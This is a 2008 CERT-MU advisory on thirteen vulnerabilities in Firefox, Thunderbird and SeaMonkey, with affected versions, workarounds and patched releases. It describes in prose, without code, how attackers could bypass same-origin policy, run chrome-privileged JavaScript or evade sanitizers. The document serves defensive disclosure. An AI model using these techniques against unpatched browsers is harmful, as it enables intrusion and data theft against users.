CERT-MU AD-2008-22
Multiple Vulnerabilities in Mozilla products
Original issue date: 22 December, 2008
Overview
Multiple vulnerabilities have been reported in Mozilla Firefox, SeaMonkey and Thunderbird which could allow a remote attacker to bypass certain security restrictions, to disclose sensitive information, or to potentially compromise an affected system.
Description
1. Mozilla layout engine crash vulnerability (CVE-2008-5500)
Memory corruption vulnerabilities exists in the layout engine of Mozilla Firefox 3.x and 2.x, Thunderbird 2.x and SeaMonkey 1.x which could allow remote attackers to execute arbitrary code or create denial of service (application crash) condition on the target system. A remote attacker can exploit this vulnerability by creating specially crafted HTML file that, when loaded by the target user, will trigger Reachable assertion or integer overflow memory corruption errors in the layout engine. The code will run with the privileges of the target user.
2. Mozilla assertion failure layout engine crash vulnerability (CVE-2008-5501)
A memory corruption vulnerability exists due to an assertion failure in the layout engine of Mozilla Firefox 3.x, Thunderbird 2.x and SeaMonkey 1.x which could allow remote attackers to execute arbitrary code or cause denial of service (application crash) condition on the target system.
Mozilla Firefox 2.x is not affected by this vulnerability.
3. JavaScript engine crash vulnerability (CVE-2008-5502)
A memory corruption vulnerability exists in GetXMLEntity() method of JavaScript engine available with Mozilla Firefox 3.x before 3.0.5, Thunderbird 2.x, and SeaMonkey 1.x which could allow remote attackers to execute arbitrary code or cause denial of service (application crash) condition on the target system.
Mozilla Firefox 2.x is not affected by this vulnerability.
4. XBL binding same origin policy by pass vulnerability (CVE-2008-5503)
This vulnerability is caused due to improper security chek of same origin policy performed by the loadBindingDocument() function in Mozilla Firefox 2.x, Thunderbird 2.x, and SeaMonkey 1.x. This vulnerability could allow remote attackers to read or access data from other domains via crafted XBL bindings.
Workarounds
Disable JavaScript until a version containing these fixes can be installed.
5. Mozilla Firefox 2 feed preview arbitrary JavaScript execution
Vulnerability (CVE-2008-5504)
A vulnerability exists in the feed preview functionality of Mozilla Firefox 2.x before 2.0.0.19, which could allow remote attackers to run arbitrary JavaScript with chrome privileges on the systems having the affected version of application.
Firefox 3, Thunderbird and SeaMonkey is not affected by this issue.
Workarounds
Disable JavaScript until a version containing these fixes can be installed.
6. Mozilla Firefox 3 XUL persist attribute privacy voilation vulnerability (CVE-2008-5505)
This vulnerability in Mozilla Firefox 3.x before 3.0.5 could allow remote attackers to store cookie like information on a user's computer, even with cookies turned off, by using the ‘persist' attribute of XUL elements. The stored information could later be retrieved by a website. This issue could be used by a website to write persistent data in a user's browser and track the user across browsing sessions. Additionally, this issue could allow a website to bypass the limits normally placed on cookie size and number.
7. XMLHttpRequest 302 response disclosure vulnerability (CVE-2008-5506)
This vulnerability is caused due to an error when processing "XMLHttpRequest" requests in Mozilla Firefox 3.x and 2.x, Thunderbird 2.x, and SeaMonkey 1.x to a web server which redirects the browser via a 302 HTTP status code. This can be exploited to bypass the same-origin policy and disclose sensitive cross-domain response information e.g. URL parameters and content in the response body.
A remote attacker can exploit this vulnerability by causing the browser to issue an XMLHttpRequest to an attacker-controlled resource which redirects the browser via a 302 HTTP status code to a a different domain, then reading content from the response.
Workarounds
Disable JavaScript until a version containing these fixes can be installed.
8. JavaScript URLs error message same origin policy bypass vulnerability
(CVE-2008-5507)
This vulnerability in Mozilla Firefox 3.x and 2.x before 2.0.0.20, Thunderbird 2.x, and SeaMonkey 1.x could allow remote attackers to bypass the same origin policy and disclose sensitive information from the other domain. This vulnerability is caused due to an error when processing JavaScript URLs that redirects the browser to another domain returning non-JavaScript data. Upon attempting to load the non-JavaScript data as JavaScript a syntax error is generated that can reveal some of the file context via the window.onerror DOM API.
Note: On windows Firefox 2.0.0.20 has been released to resolve this issue.
Workarounds
Disable JavaScript until a version containing these fixes can be installed.
9. Leading whitespace and control character URLs improper parsing vulnerability
(CVE-2008-5508)
A URL parsing vulnerability exists in Mozilla Firefox 3.x and 2.x, Thunderbird 2.x and SeaMonkey 1.x, which could allow remote attackers to misrepresent URLs and simplify phishing attacks.
This vulnerability is caused due to an error when processing URLs starting with whitespace or certain control characters which could lead to incorrect parsing resulting in a malformed URL being output by the parser.
10. CSS parser ignored escaped null characters vulnerability (CVE-2008-5510)
This vulnerability is caused due to an error in the CSS parser of in Mozilla Firefox 3.x and 2.x, Thunderbird 2.x, and SeaMonkey 1.x while parsing the escaped null character, i.e. '\0'. The CSS parser in ignores the '\0' escaped null character, which could allow remote attackers to bypass protection mechanisms such as script sanitization routines in web applications.
11. Unloaded document XBL binding XSS vulnerability (CVE-2008-5511)
This vulnerability is caused due to an error when processing an XBL binding attached to an unloaded document by Mozilla Firefox 3.x and 2.x, Thunderbird 2.x, and SeaMonkey 1.x. This could be exploited by remote attackers to bypass the same origin policy and conduct cross-site scripting (XSS) attacks to execute arbitrary JavaScript within the context of a different website.
This vulnerability can be exploited by creating an HTML document with a specially crafted XBL binding and enticing the user to load the crafted document.
Workarounds
Disable JavaScript until a version containing these fixes can be installed.
12. XPCNativeWrappers arbritrary JavaScript execution vulnerability
(CVE-2008-5512)
This vulnerability is caused due to errors in XPCNativeWrappers of Mozilla Firefox 3.x and 2.x, Thunderbird 2.x, and SeaMonkey 1.x. This could be exploited by remote attackers to pollute "XPCNativeWrappers" and execute arbitrary JavaScript code with chrome privileges.
A remote attacker can exploit this vulnerability by creating a specially crafted HTML document that, when loaded by the target user, will invoke XPCNativeWrappers to execute arbitrary JavaScript with chrome privileges.
Workarounds
Disable JavaScript until a version containing these fixes can be installed.
13. Firefox Session restore feature vulnerability (CVE-2008-5513)
This vulnerability is caused due to errors in the session-restore feature present in Mozilla Firefox 3.x and 2.x which could be exploited by remote attackers to bypass the same origin policy, inject content into documents associated with other domains, and conduct cross-site scripting (XSS) attacks. restoration of SessionStore data.
The session restore feature in Mozilla Firefox 3.x and 2.x does not properly store the SessionStore data. A remote attacker can exploit this issue to inject arbritrary content into an incorrect document storage location. Then the restoration of the stored SessionStore data could allow the execution of arbitrary JavaScript code in a different domain or with chrome privileges.
Thunderbird 2.x, and SeaMonkey 1.x are not affected by this vulnerability.
Workarounds
Disable JavaScript or the session-restore feature until a version containing these fixes can be installed.
Affected systems
• Mozilla Firefox 3.0.4
• Mozilla Firefox 2.0.0.18
• Mozilla Thunderbird 2.0.0.18
• Mozilla SeaMonkey 1.1.13
Impact
Severity Rating: High
Solution
Mozilla Firefox 3.x users update to Mozilla Firefox version 3.0.5.
http://www.mozilla.com/en-US/firefox/all.html
Mozilla Firefox 2.x users update to Mozilla Firefox 2.0.0.20
http://www.mozilla.com/en-US/firefox/all-older.html
Update to Mozilla SeaMonkey version 1.1.14
http://www.seamonkey-project.org/releases/
Update to Mozilla Thunderbird 2.0.0.19
Disclaimer
The information provided herein is on "as is" basis, without warranty of any kind.
Vendor Information
Mozilla
http://www.mozilla.org/security/announce/2008/mfsa2008-60.html
http://www.mozilla.org/security/announce/2008/mfsa2008-61.html
http://www.mozilla.org/security/announce/2008/mfsa2008-62.html
http://www.mozilla.org/security/announce/2008/mfsa2008-63.html
http://www.mozilla.org/security/announce/2008/mfsa2008-64.html
http://www.mozilla.org/security/announce/2008/mfsa2008-65.html
http://www.mozilla.org/security/announce/2008/mfsa2008-66.html
http://www.mozilla.org/security/announce/2008/mfsa2008-67.html
http://www.mozilla.org/security/announce/2008/mfsa2008-68.html
http://www.mozilla.org/security/announce/2008/mfsa2008-69.html
CVE Name
CVE-2008-5500
CVE-2008-5501
CVE-2008-5502
CVE-2008-5503
CVE-2008-5504
CVE-2008-5505
CVE-2008-5506
CVE-2008-5507
CVE-2008-5508
CVE-2008-5510
CVE-2008-5511
CVE-2008-5512
CVE-2008-5513
References
Secunia
http://secunia.com/advisories/33184/
http://secunia.com/advisories/33203/
SecurityFocus
http://www.securityfocus.com/bid/32882/
SecurityTracker
http://securitytracker.com/alerts/2008/Dec/1021417.html
http://www.securitytracker.com/alerts/2008/Dec/1021428.html
http://www.securitytracker.com/alerts/2008/Dec/1021427.html
http://www.securitytracker.com/alerts/2008/Dec/1021437.html
http://securitytracker.com/alerts/2008/Dec/1021418.html
http://www.securitytracker.com/alerts/2008/Dec/1021429.html
|
